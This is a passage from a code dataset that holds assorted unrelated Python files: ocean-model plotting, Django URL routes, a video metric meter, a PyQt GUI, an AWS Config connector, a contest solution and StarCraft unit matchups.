self.hyperparameters['RTT_DRAMATIC_CHANGE_THRESHOLD']):\n return self.hyperparameters['Rewards']['DRAMATIC_RTT_INCREASE']\n elif rtt > (self.base_rtt * self.hyperparameters['RTT_CHANGE_THRESHOLD']):\n return self.hyperparameters['Rewards']['INCREASED_RTT']\n elif rtt > (self.base_rtt * 1.4):\n return self.hyperparameters['Rewards']['MINOR_RTT_INCREASE']\n elif action == self.hyperparameters['Actions']['INCREASE_QUADRATIC']:\n return self.hyperparameters['Rewards']['INCREASED_CWND_PERCENTAGE']\n elif action == self.hyperparameters['Actions']['INCREASE_ABSOLUTE']:\n return self.hyperparameters['Rewards']['INCREASED_CWND_ABSOLUTE']\n else:\n return self.hyperparameters['Rewards']['NO_REWARD']\n","repo_name":"squidarth/network-performance-jupyter","sub_path":"src/ml_strategy.py","file_name":"ml_strategy.py","file_ext":"py","file_size_in_byte":13097,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"}
+{"seq_id":"37630542544","text":"import datetime as dt\n\nimport ioos_model_comparisons.configs as conf\nimport numpy as np\nimport pandas as pd\nfrom ioos_model_comparisons.platforms import (get_active_gliders, \n get_argo_floats_by_time,\n get_bathymetry)\nfrom ioos_model_comparisons.plotting_ugos import surface_current_fronts_single\n\nfrom ioos_model_comparisons.regions import region_config\nimport matplotlib\nimport time\nfrom pathlib import Path\nimport xarray as xr\n\n# Directory where the file should be downloaded\n# ddir = Path('/Users/mikesmith/data/tops/')\nddir = Path('/home/hurricaneadm/data/tops/')\n\nstartTime = time.time() # Start time to see how long the script took\nmatplotlib.use('agg')\n\n# Set path to save plots\npath_save = (conf.path_plots / \"maps\")\n\n# initialize keyword arguments for map plots\nkwargs = dict()\nkwargs['transform'] = conf.projection\nkwargs['dpi'] = conf.dpi\nkwargs['overwrite'] = True\n\n# Get yesterday dates\nnow = dt.datetime.now()\n\n# Subtract one day from the current date to get yesterday's date\nyesterday = now - dt.timedelta(days=1)\ntomorrow = now + dt.timedelta(days=1)\n\nfor d in [yesterday, now, tomorrow]:\n \n # Format the date\n formatted_date_1 = yesterday.strftime('%Y%m%d')\n formatted_date_2 = d.strftime('%Y%m%d')\n\n # Formatter for time\n tstr = '%Y-%m-%d %H:%M:%S'\n\n # This is the initial time to start the search for argo/gliders\n search_start = d - dt.timedelta(hours=conf.search_hours)\n\n region = region_config('gom') #gom, loop_current, yucatan\n extent = region['extent']\n print(f'Region: {region[\"name\"]}, Extent: {extent}')\n kwargs['path_save'] = path_save / region['folder']\n if conf.argo:\n argo_data = get_argo_floats_by_time(extent, search_start, d)\n else:\n argo_data = pd.DataFrame()\n\n if conf.gliders:\n glider_data = get_active_gliders(extent, search_start, d, parallel=False)\n else:\n glider_data = pd.DataFrame()\n\n if conf.bathy:\n bathy_data = get_bathymetry(extent)\n\n # The name we want to give to the downloaded file\n file_name = f'tops_compositem_{formatted_date_1}_{formatted_date_2}.nc'\n\n fname = ddir / yesterday.strftime('%Y/%m') / file_name\n\n # Load TOPS\n tops = xr.open_dataset(fname).rename({'uvel': 'u', 'vvel': 'v'})\n tops.attrs['model'] = 'TOPS'\n\n # Deal with time related variables\n ctime = yesterday\n search_window_t0 = (ctime - dt.timedelta(hours=conf.search_hours)).strftime(tstr)\n search_window_t1 = ctime.strftime(tstr) \n\n try:\n topst = tops.sel(depth=0)\n print(f\"TOPS: True\")\n tops_flag = True\n except KeyError as error:\n print(f\"TOPS: False - {error}\")\n tops_flag = False\n \n print(\"\\n\")\n\n if 'eez' in region:\n kwargs[\"eez\"] = region[\"eez\"]\n\n if 'figure' in region:\n if 'legend' in region['figure']:\n kwargs['cols'] = region['figure']['legend']['columns']\n\n if 'figsize' in region['figure']:\n kwargs['figsize'] = region['figure']['figsize']\n\n try:\n kwargs['bathy'] = bathy_data.sel(\n longitude=slice(extent[0] - 1, extent[1] + 1),\n latitude=slice(extent[2] - 1, extent[3] + 1)\n )\n except NameError:\n pass\n \n extended = np.add(extent, [-1, 1, -1, 1]).tolist()\n\n tops_sub = topst.sel(\n lon=slice(extended[0], extended[1]),\n lat=slice(extended[2], extended[3])\n ).set_coords(['u', 'v'])\n\n # Check if any asset data exists and subset to appropriate region and time\n # Was any argo data downloaded?\n if not argo_data.empty:\n argo_lon = argo_data['lon']\n argo_lat = argo_data['lat']\n argo_region = argo_data[\n (extended[0] <= argo_lon) & (argo_lon <= 
extended[1]) & (extended[2] <= argo_lat) & (argo_lat <= extended[3])\n ]\n argo_region.sort_index(inplace=True)\n idx = pd.IndexSlice\n kwargs['argo'] = argo_region.loc[idx[:, search_window_t0:search_window_t1], :]\n\n # Was any glider data downloaded?\n if not glider_data.empty:\n glider_lon = glider_data['lon']\n glider_lat = glider_data['lat']\n glider_region = glider_data[\n (extended[0] <= glider_lon) & (glider_lon <= extended[1]) & (extended[2] <= glider_lat) & (glider_lat <= extended[3])\n ]\n glider_region = glider_region[\n (search_window_t0 <= glider_region.index.get_level_values('time'))\n &\n (glider_region.index.get_level_values('time') <= search_window_t1)\n ]\n kwargs['gliders'] = glider_region\n\n try:\n surface_current_fronts_single(tops_sub.squeeze(), region, **kwargs)\n except Exception as e:\n print(f\"Failed to process TOPS at {ctime}\")\n print(f\"Error: {e}\")","repo_name":"rucool/ioos_model_comparisons","sub_path":"scripts/maps/models/synchronous/surface_current_contour_gom_tops.py","file_name":"surface_current_contour_gom_tops.py","file_ext":"py","file_size_in_byte":4815,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"21242314726","text":"\"\"\"CYOAGen URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, include\n\nfrom .views import AdventureListView, AdventureDetailView, AdventureUpdateView, AdventureCreateView, RoomPlayView, register_view\n\nurlpatterns = [\n path('', AdventureListView.as_view(), name= 'adventure-list'),\n path('register/', register_view, name=\"register\"),\n path('create/', AdventureCreateView.as_view(), name= 'adventure-create'),\n path('/', AdventureDetailView.as_view(), name= 'adventure-detail'),\n path('/edit', AdventureUpdateView.as_view(), name= 'adventure-update'),\n path('//play', RoomPlayView.as_view(), name = 'play-room'),\n]\n","repo_name":"icynewyear/cyoa-django","sub_path":"adventure/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1308,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"20079685964","text":"import logging\n\nimport torch\nfrom classy_vision.meters import ClassyMeter\n\n\nclass VideoMeter(ClassyMeter):\n \"\"\"An abstraction of meter for evaluating video models.\n\n Video-level metric is computed by averaging clip-level predictions and\n compare the result with video-level groundtruth label.\n\n This meter abstraction can wrap conventional classy meters by passing\n averaged clip-level predictions to the meter needed for video level metrics.\n \"\"\"\n\n def __init__(self, clips_per_video_train, clips_per_video_test):\n \"\"\"Constructor of VideoMeter class.\n\n Args:\n clips_per_video_train: No. of clips sampled per video at train time\n clips_per_video_test: No. of clips sampled per video at test time\n \"\"\"\n super().__init__()\n\n self._clips_per_video_train = clips_per_video_train\n self._clips_per_video_test = clips_per_video_test\n\n @property\n def value(self):\n return self.meter.value\n\n def sync_state(self):\n self.meter.sync_state()\n\n @property\n def meter(self) -> \"ClassyMeter\":\n \"\"\"Every video meter should implement to have its own internal meter.\n\n It consumes the video level predictions and ground truth label, and compute\n the actual metrics.\n\n Returns:\n An instance of ClassyMeter.\n \"\"\"\n raise NotImplementedError\n\n def get_classy_state(self):\n \"\"\"Contains the states of the meter.\"\"\"\n state = {}\n state[\"meter_state\"] = self.meter.get_classy_state()\n state[\"name\"] = self.name\n state[\"clips_per_video_train\"] = self._clips_per_video_train\n state[\"clips_per_video_test\"] = self._clips_per_video_test\n return state\n\n def set_classy_state(self, state):\n assert (\n self.name == state[\"name\"]\n ), \"State name {state_name} does not match meter name {obj_name}\".format(\n state_name=state[\"name\"], obj_name=self.name\n )\n assert (\n self._clips_per_video_train == state[\"clips_per_video_train\"]\n ), \"incompatible clips_per_video_train for video accuracy\"\n assert (\n self._clips_per_video_test == state[\"clips_per_video_test\"]\n ), \"incompatible clips_per_video_test for video accuracy\"\n # Restore the state -- correct_predictions and sample_count.\n self.reset()\n self.meter.set_classy_state(state[\"meter_state\"])\n\n def update(self, model_output, target, is_train, **kwargs):\n \"\"\"Updates any internal state of meter with new model output and target.\n\n Args:\n model_output: tensor of shape (B * clips_per_video, C) where each value is\n either logit or class probability.\n target: tensor of shape (B * clips_per_video).\n is_train if True, it is training stage when meter is updated\n\n Note: For binary classification, C=2.\n \"\"\"\n num_clips = len(model_output)\n clips_per_video = (\n self._clips_per_video_train if is_train else self._clips_per_video_test\n )\n\n if not num_clips % clips_per_video == 0:\n logging.info(\n \"Skip meter update. Because for video model testing, batch size \"\n \"is expected to be a multplier of No. of clips per video. 
\"\n \"num_clips: %d, clips_per_video: %d\" % (num_clips, clips_per_video)\n )\n return\n\n num_videos = num_clips // clips_per_video\n for i in range(num_videos):\n clip_labels = target[i * clips_per_video : (i + 1) * clips_per_video]\n if clip_labels.ndim == 1:\n # single label\n assert (\n len(torch.unique(clip_labels)) == 1\n ), \"all clips from the same video should have same label\"\n elif clip_labels.ndim == 2:\n # multi-hot label\n for j in range(1, clip_labels.shape[0]):\n assert torch.equal(\n clip_labels[0], clip_labels[j]\n ), \"all clips from the same video should have the same labels\"\n else:\n raise ValueError(\n \"dimension of clip label matrix should be either 1 or 2\"\n )\n\n video_model_output = torch.mean(\n torch.reshape(model_output, (num_videos, clips_per_video, -1)), 1\n )\n video_target = target[::clips_per_video]\n self.meter.update(video_model_output, video_target)\n\n def reset(self):\n self.meter.reset()\n\n def validate(self, model_output_shape, target_shape):\n self.meter.validate(model_output_shape, target_shape)\n","repo_name":"facebookresearch/ClassyVision","sub_path":"classy_vision/meters/video_meter.py","file_name":"video_meter.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":1563,"dataset":"github-code","pt":"3"}
+{"seq_id":"26122496496","text":"from PyQt5.QtCore import QMetaObject, QCoreApplication, Qt\nfrom PyQt5.QtGui import QIntValidator, QIcon\nfrom PyQt5.QtWidgets import QWidget, QGridLayout, QVBoxLayout, QHBoxLayout, QTabWidget, QPushButton, QApplication, \\\n QMainWindow, QLineEdit, QCheckBox\n\nimport customlogger as logger\nfrom chihiro import ROOT_DIR\nfrom gui.events.calculator_view_events import ToggleUnitLockingOptionsVisibilityEvent\nfrom gui.events.chart_viewer_events import PopupChartViewerEvent\nfrom gui.events.service.tips_refresher_service import kill_tip_refresher_service\nfrom gui.events.state_change_events import ShutdownTriggeredEvent, BackupFlagsEvent\nfrom gui.events.utils import eventbus\nfrom gui.viewmodels.card import CardView, CardModel, IconLoaderView, IconLoaderModel\nfrom gui.viewmodels.potential import PotentialView, PotentialModel\nfrom gui.viewmodels.quicksearch import QuickSearchView, QuickSearchModel, SongQuickSearchView, SongQuickSearchModel\nfrom gui.viewmodels.simulator.wide_smart import MainView, MainModel\nfrom gui.viewmodels.song import SongView, SongModel\nfrom gui.viewmodels.tips_view import TipView\nfrom gui.viewmodels.unit import UnitView, UnitModel\nfrom logic.profile import profile_manager, unit_storage\nfrom logic.search import indexer, search_engine\n\n\nclass CustomMainWindow(QMainWindow):\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n def setui(self, ui):\n self.ui = ui\n\n def keyPressEvent(self, event):\n key = event.key()\n if QApplication.keyboardModifiers() == Qt.ControlModifier and key == Qt.Key_F:\n self.ui.quicksearch_view.focus()\n if QApplication.keyboardModifiers() == (Qt.ShiftModifier | Qt.ControlModifier) and key == Qt.Key_F:\n self.ui.songsearch_view.focus()\n if QApplication.keyboardModifiers() == (Qt.ShiftModifier | Qt.ControlModifier) and key == Qt.Key_H:\n eventbus.eventbus.post(ToggleUnitLockingOptionsVisibilityEvent())\n if QApplication.keyboardModifiers() == Qt.ControlModifier and key == Qt.Key_S:\n logger.info(\"User data backed up\")\n eventbus.eventbus.post(ShutdownTriggeredEvent())\n eventbus.eventbus.post(BackupFlagsEvent())\n unit_storage.clean_all_units(grand=False)\n for r_idx in range(self.ui.unit_view.widget.count()):\n widget = self.ui.unit_view.widget.itemWidget(self.ui.unit_view.widget.item(r_idx))\n widget.update_unit()\n profile_manager.cleanup()\n\n def closeEvent(self, event):\n eventbus.eventbus.post(ShutdownTriggeredEvent())\n eventbus.eventbus.post(BackupFlagsEvent())\n event.accept()\n\n# noinspection PyAttributeOutsideInit\nclass UiMainWindow:\n def __init__(self, main):\n self.main = main\n\n def setup_ui(self):\n logger.info(\"Initializing UI\")\n self.main.resize(1850, 1000)\n self.setup_base()\n self.setup_calculator_song_layout()\n self.setup_card_unit_layout()\n self.setup_tip_view()\n self.main.setCentralWidget(self.central_widget)\n self.retranslate_ui(self.main)\n QMetaObject.connectSlotsByName(self.main)\n\n def setup_base(self):\n logger.info(\"Setting up UI base\")\n\n self.central_widget = QWidget(self.main)\n self.grid_layout = QGridLayout(self.central_widget)\n self.main_layout = QVBoxLayout()\n\n def setup_tip_view(self):\n self.tip_view = TipView()\n self.grid_layout.addWidget(self.tip_view, 1, 0, 1, 1)\n\n def setup_calculator_song_layout(self):\n logger.info(\"Setting up calculator and song layouts\")\n\n self.calculator_song_layout = QHBoxLayout()\n self.calculator = QTabWidget(self.central_widget)\n self.calculator_view = MainView()\n 
self.calculator_model = MainModel(self.calculator_view)\n self.calculator_view.set_model(self.calculator_model)\n self.calculator_view.setup()\n self.potential_view = PotentialView()\n self.potential_model = PotentialModel(self.potential_view)\n self.potential_view.set_model(self.potential_model)\n self.potential_model.initialize_data()\n self.calculator.addTab(self.calculator_view.widget, \"Simulator\")\n self.calculator.addTab(self.potential_view.widget, \"Potentials\")\n self.calculator_song_layout.addWidget(self.calculator)\n self.song_layout = QVBoxLayout()\n\n self.import_layout = QHBoxLayout()\n self.import_text = QLineEdit(self.main)\n self.import_text.setPlaceholderText(\"Input user ID (9 digits, e.g. 123456789)\")\n self.import_text.setValidator(QIntValidator(0, 999999999, None)) # Only number allowed\n self.calculator_view.setUserID(self.import_text)\n self.import_button = QPushButton(\"Import from ID\", self.main)\n self.import_button.pressed.connect(lambda: self.import_from_id(self.import_text.text()))\n self.import_layout.addWidget(self.import_text)\n self.import_layout.addWidget(self.import_button)\n self.song_layout.addLayout(self.import_layout)\n\n self.song_view = SongView(self.central_widget)\n self.song_model = SongModel(self.song_view)\n self.song_model.initialize_data()\n self.song_view.set_model(self.song_model)\n self.song_layout.addWidget(self.song_view.widget)\n self.songsearch_view = SongQuickSearchView(self.central_widget)\n self.songsearch_model = SongQuickSearchModel(self.songsearch_view, self.song_view)\n self.songsearch_view.set_model(self.songsearch_model)\n hl = QHBoxLayout()\n hl.addWidget(self.songsearch_view.widget)\n chart_viewer_button = QPushButton(\"Popup Chart Viewer\")\n hl.addWidget(chart_viewer_button)\n chart_viewer_button.pressed.connect(lambda: eventbus.eventbus.post(PopupChartViewerEvent(look_for_chart=True)))\n self.song_layout.addLayout(hl)\n\n self.calculator_song_layout.addLayout(self.song_layout)\n self.calculator_song_layout.setStretch(0, 3)\n self.calculator_song_layout.setStretch(1, 2)\n self.main_layout.addLayout(self.calculator_song_layout)\n self.calculator.setCurrentIndex(0)\n\n def setup_card_unit_layout(self):\n logger.info(\"Setting up card and unit layouts\")\n\n self.card_unit_layout = QHBoxLayout()\n self.card_layout = QVBoxLayout()\n self.card_quicksearch_layout = QHBoxLayout()\n\n self.quicksearch_layout = QHBoxLayout()\n\n # Set up card MV first\n self.card_view = CardView(self.central_widget)\n self.card_model = CardModel(self.card_view)\n self.card_view.set_model(self.card_model)\n self.card_model.initialize_cards()\n self.card_view.initialize_pics()\n self.card_view.connect_cell_change()\n self.card_layout.addWidget(self.card_view.widget)\n\n # Need card view\n self.quicksearch_view = QuickSearchView(self.central_widget)\n self.quicksearch_model = QuickSearchModel(self.quicksearch_view, self.card_view)\n self.quicksearch_view.set_model(self.quicksearch_model)\n self.card_quicksearch_layout.addLayout(self.quicksearch_layout)\n self.quicksearch_layout.addWidget(self.quicksearch_view.widget)\n self.highlight_checkbox = QCheckBox(self.central_widget)\n self.highlight_checkbox.setText(\"Highlight Carnival Idols\")\n self.highlight_checkbox.clicked.connect(lambda _: self.card_model.highlight_event_cards(_))\n self.quicksearch_layout.addWidget(self.highlight_checkbox)\n self.quicksearch_model.add_options(self.quicksearch_layout, self.central_widget)\n\n # Then icon loader MV since it makes use of the card model\n 
self.icon_loader_view = IconLoaderView(self.central_widget)\n self.icon_loader_model = IconLoaderModel(self.icon_loader_view, self.card_model)\n self.icon_loader_view.set_model(self.icon_loader_model)\n self.icon_loader_view.widget.setToolTip(\"Larger icons require more RAM to run.\")\n self.icon_loader_model.load_image(0)\n self.card_quicksearch_layout.addWidget(self.icon_loader_view.widget)\n self.card_layout.addLayout(self.card_quicksearch_layout)\n\n self.card_layout.setStretch(1, 1)\n\n self.unit_layout = QVBoxLayout()\n self.unit_view = UnitView(self.central_widget)\n self.unit_model = UnitModel(self.unit_view)\n self.unit_view.set_model(self.unit_model)\n self.unit_model.initialize_units()\n self.unit_layout.addWidget(self.unit_view.widget)\n\n self.card_unit_layout.addLayout(self.unit_layout)\n self.card_unit_layout.addLayout(self.card_layout)\n\n self.add_unit_button = QPushButton()\n self.add_unit_button.setText(\"Add unit\")\n self.add_unit_button.setToolTip(\n \"Add an untitled unit. Untitled units are not saved upon exit!\\n\"\n \"Make sure to give your units a name. Unit names must be different.\\n\"\n \"First/Red card is the leader, last/blue card is the guest.\")\n self.add_unit_button.clicked.connect(lambda: self.unit_view.add_empty_widget())\n self.unit_layout.addWidget(self.add_unit_button)\n\n self.card_unit_layout.setStretch(0, 1)\n self.card_unit_layout.setStretch(1, 2)\n self.main_layout.addLayout(self.card_unit_layout)\n self.grid_layout.addLayout(self.main_layout, 0, 0, 1, 1)\n\n def import_from_id(self, game_id):\n self.card_view.disconnect_cell_change()\n updated_card_ids = profile_manager.import_from_gameid(game_id)\n if updated_card_ids is None:\n self.card_view.connect_cell_change()\n return\n indexer.im.initialize_index_db(updated_card_ids)\n indexer.im.reindex(updated_card_ids)\n search_engine.engine.refresh_searcher()\n self.card_model.initialize_cards(updated_card_ids)\n self.card_view.connect_cell_change()\n\n def retranslate_ui(self, MainWindow):\n _translate = QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"main\", \"Chihiro\"))\n\n def disable_auto_resize(self):\n self.card_view.toggle_auto_resize(False)\n\n\ndef cleanup():\n logger.info(\"Waiting for all threads to finish...\")\n kill_tip_refresher_service()\n\n\ndef setup_gui(*args):\n app = QApplication(*args)\n app.setApplicationName(\"Chihiro\")\n icon = QIcon(str(ROOT_DIR / 'icon.png'))\n app.setWindowIcon(icon)\n app.lastWindowClosed.connect(lambda: cleanup())\n MainWindow = CustomMainWindow()\n ui = UiMainWindow(MainWindow)\n MainWindow.setui(ui)\n ui.setup_ui()\n ui.disable_auto_resize()\n logger.info(\"GUI setup successfully\")\n return app, MainWindow\n","repo_name":"deresute-tools/deresute-tools","sub_path":"src/gui/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10675,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"}
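The keyPressEvent override in the entry above dispatches Ctrl+F, Ctrl+Shift+F, and Ctrl+S by hand. For comparison, a minimal PyQt5 sketch of the same bindings via QShortcut; the window and handler arguments here are placeholders, not the entry's actual objects:

from PyQt5.QtWidgets import QShortcut
from PyQt5.QtGui import QKeySequence

def register_shortcuts(window, on_find, on_song_find, on_save):
    # Each QShortcut is parented to the window, so it fires anywhere inside it.
    QShortcut(QKeySequence("Ctrl+F"), window).activated.connect(on_find)
    QShortcut(QKeySequence("Ctrl+Shift+F"), window).activated.connect(on_song_find)
    QShortcut(QKeySequence("Ctrl+S"), window).activated.connect(on_save)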
+{"seq_id":"25221499745","text":"import logging\nfrom typing import List\n\nfrom cloudforet.plugin.connector.aws_boto_connector import AWSBotoConnector\n\n__all__ = ['AWSConfigConnector']\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AWSConfigConnector(AWSBotoConnector):\n\n def init_client(self, region_name: str):\n self.client = self.session.client('config', region_name=region_name)\n\n def describe_conformance_packs(self):\n response = self.client.describe_conformance_packs()\n return response.get('ConformancePackDetails', [])\n\n def describe_conformance_pack_compliance(self, pack_name: str):\n response = self.client.describe_conformance_pack_compliance(ConformancePackName=pack_name)\n return response.get('ConformancePackRuleComplianceList', [])\n\n def get_compliance_details_by_config_rule(self, rule_name: str):\n return self.client.get_compliance_details_by_config_rule(ConfigRuleName=rule_name)\n\n def get_conformance_pack_compliance_details(self, pack_name: str, results: List[dict] = None,\n next_token: str = None):\n results = results or []\n kwargs = {\n 'ConformancePackName': pack_name\n }\n\n if next_token:\n kwargs['NextToken'] = next_token\n\n response = self.client.get_conformance_pack_compliance_details(**kwargs)\n results += response.get('ConformancePackRuleEvaluationResults', [])\n\n if 'NextToken' in response:\n self.get_conformance_pack_compliance_details(pack_name, results, response['NextToken'])\n\n return results\n\n def describe_config_rules(self, rule_names: List[str]):\n config_rules = []\n for items in self._page_by_size(rule_names, 25):\n response = self.client.describe_config_rules(ConfigRuleNames=items)\n config_rules += response.get('ConfigRules', [])\n\n return config_rules\n\n @staticmethod\n def _page_by_size(items: List[str], size: int):\n page_count = int(len(items) / size) + 1\n\n for num in range(page_count):\n offset = size * num\n yield items[offset:offset + size]\n","repo_name":"cloudforet-io/plugin-aws-config-inven-collector","sub_path":"src/cloudforet/plugin/connector/aws_config_connector.py","file_name":"aws_config_connector.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"44828231869","text":"#206 C\n\nfrom collections import Counter\n\nn = int(input())\nN = [int(i) for i in range(n)]\nA = list(map(int, input().split()))\nA_ = Counter(A)\nans = 0\ntotal = 0\n\nfor i in range(len(A) - 1, 0, -1):\n ans += i\n\nfor j in A_:\n count = 0\n if A_[j] != 1:\n for k in range(1, A_[j]):\n count += k\n ans = ans - count\n\nprint(ans)","repo_name":"ar20190114/atcoder_206","sub_path":"atcoder2.py","file_name":"atcoder2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"29353823950","text":"import numpy as np\r\n\r\n\r\ndef strongAgainst(a, b):\r\n stronger.add((units[a], units[b]))\r\n\r\ndef weakAgainst(a, b):\r\n strongAgainst(b, a)\r\n\r\ndef makeStrongerRelation():\r\n strongAgainst('Marine', 'Marauder')\r\n strongAgainst('Marine', 'Hydralisk')\r\n strongAgainst('Marine', 'Immortal')\r\n weakAgainst ('Marine', 'Siege Tank')\r\n weakAgainst ('Marine', 'Baneling')\r\n weakAgainst ('Marine', 'Colossus')\r\n\r\n strongAgainst('Marauder', 'Thor')\r\n strongAgainst('Marauder', 'Roach')\r\n strongAgainst('Marauder', 'Stalker')\r\n weakAgainst ('Marauder', 'Marine')\r\n weakAgainst ('Marauder', 'Zergling')\r\n weakAgainst ('Marauder', 'Zealot')\r\n\r\n strongAgainst('Reaper', 'SCV')\r\n strongAgainst('Reaper', 'Drone')\r\n strongAgainst('Reaper', 'Probe')\r\n weakAgainst ('Reaper', 'Marauder')\r\n weakAgainst ('Reaper', 'Roach')\r\n weakAgainst ('Reaper', 'Stalker')\r\n\r\n strongAgainst('Ghost', 'Raven')\r\n strongAgainst('Ghost', 'Infestor')\r\n strongAgainst('Ghost', 'High Templar')\r\n weakAgainst ('Ghost', 'Marauder')\r\n weakAgainst ('Ghost', 'Zergling')\r\n weakAgainst ('Ghost', 'Stalker')\r\n\r\n strongAgainst('Hellion', 'Zergling')\r\n strongAgainst('Hellion', 'Zealot')\r\n weakAgainst ('Hellion', 'Marauder')\r\n weakAgainst ('Hellion', 'Roach')\r\n weakAgainst ('Hellion', 'Stalker')\r\n\r\n strongAgainst('Hellbat', 'Zergling')\r\n strongAgainst('Hellbat', 'Zealot')\r\n weakAgainst ('Hellbat', 'Marauder')\r\n weakAgainst ('Hellbat', 'Baneling')\r\n weakAgainst ('Hellbat', 'Stalker')\r\n\r\n strongAgainst('Siege Tank', 'Marine')\r\n strongAgainst('Siege Tank', 'Hydralisk')\r\n strongAgainst('Siege Tank', 'Stalker')\r\n weakAgainst ('Siege Tank', 'Banshee')\r\n weakAgainst ('Siege Tank', 'Mutalisk')\r\n weakAgainst ('Siege Tank', 'Immortal')\r\n\r\n strongAgainst('Thor', 'Marine')\r\n strongAgainst('Thor', 'Mutalisk')\r\n strongAgainst('Thor', 'Stalker')\r\n weakAgainst ('Thor', 'Marauder')\r\n weakAgainst ('Thor', 'Zergling')\r\n weakAgainst ('Thor', 'Immortal')\r\n\r\n strongAgainst('Viking', 'Battlecruiser')\r\n strongAgainst('Viking', 'Corruptor')\r\n strongAgainst('Viking', 'Void Ray')\r\n weakAgainst ('Viking', 'Marine')\r\n weakAgainst ('Viking', 'Mutalisk')\r\n weakAgainst ('Viking', 'Stalker')\r\n\r\n strongAgainst('Raven', 'Banshee')\r\n strongAgainst('Raven', 'Roach')\r\n strongAgainst('Raven', 'Dark Templar')\r\n weakAgainst ('Raven', 'Viking')\r\n weakAgainst ('Raven', 'Hydralisk')\r\n weakAgainst ('Raven', 'Phoenix')\r\n\r\n strongAgainst('Battlecruiser', 'Thor')\r\n strongAgainst('Battlecruiser', 'Mutalisk')\r\n strongAgainst('Battlecruiser', 'Marine')\r\n weakAgainst ('Battlecruiser', 'Viking')\r\n weakAgainst ('Battlecruiser', 'Corruptor')\r\n weakAgainst ('Battlecruiser', 'Void Ray')\r\n\r\n strongAgainst('Widow Mine', 'Marauder')\r\n strongAgainst('Widow Mine', 'Roach')\r\n strongAgainst('Widow Mine', 'Immortal')\r\n weakAgainst ('Widow Mine', 'Raven')\r\n weakAgainst ('Widow Mine', 'Overseer')\r\n weakAgainst ('Widow Mine', 'Observer')\r\n\r\n strongAgainst('Liberator', 'Viking')\r\n strongAgainst('Liberator', 'Mutalisk')\r\n strongAgainst('Liberator', 'Phoenix')\r\n weakAgainst ('Liberator', 'Battlecruiser')\r\n weakAgainst ('Liberator', 'Corruptor')\r\n weakAgainst ('Liberator', 'Carrier')\r\n\r\n strongAgainst('Cyclone', 'Thor')\r\n strongAgainst('Cyclone', 'Ultralisk')\r\n strongAgainst('Cyclone', 'Immortal')\r\n weakAgainst ('Cyclone', 'Marine')\r\n weakAgainst ('Cyclone', 'Zergling')\r\n weakAgainst ('Cyclone', 
'Zealot')\r\n \r\n strongAgainst('Zealot', 'Marauder')\r\n strongAgainst('Zealot', 'Zergling')\r\n strongAgainst('Zealot', 'Immortal')\r\n weakAgainst ('Zealot', 'Hellion')\r\n weakAgainst ('Zealot', 'Roach')\r\n weakAgainst ('Zealot', 'Colossus')\r\n\r\n strongAgainst('Stalker', 'Reaper')\r\n strongAgainst('Stalker', 'Mutalisk')\r\n strongAgainst('Stalker', 'Void Ray')\r\n weakAgainst ('Stalker', 'Marauder')\r\n weakAgainst ('Stalker', 'Zergling')\r\n weakAgainst ('Stalker', 'Immortal')\r\n\r\n strongAgainst('Sentry', 'Zergling')\r\n strongAgainst('Sentry', 'Zealot')\r\n weakAgainst ('Sentry', 'Reaper')\r\n weakAgainst ('Sentry', 'Hydralisk')\r\n weakAgainst ('Sentry', 'Stalker')\r\n\r\n strongAgainst('Immortal', 'Siege Tank')\r\n strongAgainst('Immortal', 'Roach')\r\n strongAgainst('Immortal', 'Stalker')\r\n weakAgainst ('Immortal', 'Marine')\r\n weakAgainst ('Immortal', 'Zergling')\r\n weakAgainst ('Immortal', 'Zealot')\r\n\r\n strongAgainst('Colossus', 'Marine')\r\n strongAgainst('Colossus', 'Zergling')\r\n strongAgainst('Colossus', 'Zealot')\r\n weakAgainst ('Colossus', 'Viking')\r\n weakAgainst ('Colossus', 'Corruptor')\r\n weakAgainst ('Colossus', 'Immortal')\r\n\r\n strongAgainst('Phoenix', 'Banshee')\r\n strongAgainst('Phoenix', 'Mutalisk')\r\n strongAgainst('Phoenix', 'Void Ray')\r\n weakAgainst ('Phoenix', 'Battlecruiser')\r\n weakAgainst ('Phoenix', 'Corruptor')\r\n weakAgainst ('Phoenix', 'Carrier')\r\n\r\n strongAgainst('Void Ray', 'Battlecruiser')\r\n strongAgainst('Void Ray', 'Corruptor')\r\n strongAgainst('Void Ray', 'Tempest')\r\n weakAgainst ('Void Ray', 'Viking')\r\n weakAgainst ('Void Ray', 'Mutalisk')\r\n weakAgainst ('Void Ray', 'Phoenix')\r\n\r\n strongAgainst('High Templar', 'Marine')\r\n strongAgainst('High Templar', 'Hydralisk')\r\n strongAgainst('High Templar', 'Sentry')\r\n weakAgainst ('High Templar', 'Ghost')\r\n weakAgainst ('High Templar', 'Roach')\r\n weakAgainst ('High Templar', 'Colossus')\r\n\r\n strongAgainst('Dark Templar', 'SCV')\r\n strongAgainst('Dark Templar', 'Drone')\r\n strongAgainst('Dark Templar', 'Probe')\r\n weakAgainst ('Dark Templar', 'Raven')\r\n weakAgainst ('Dark Templar', 'Overseer')\r\n weakAgainst ('Dark Templar', 'Observer')\r\n\r\n 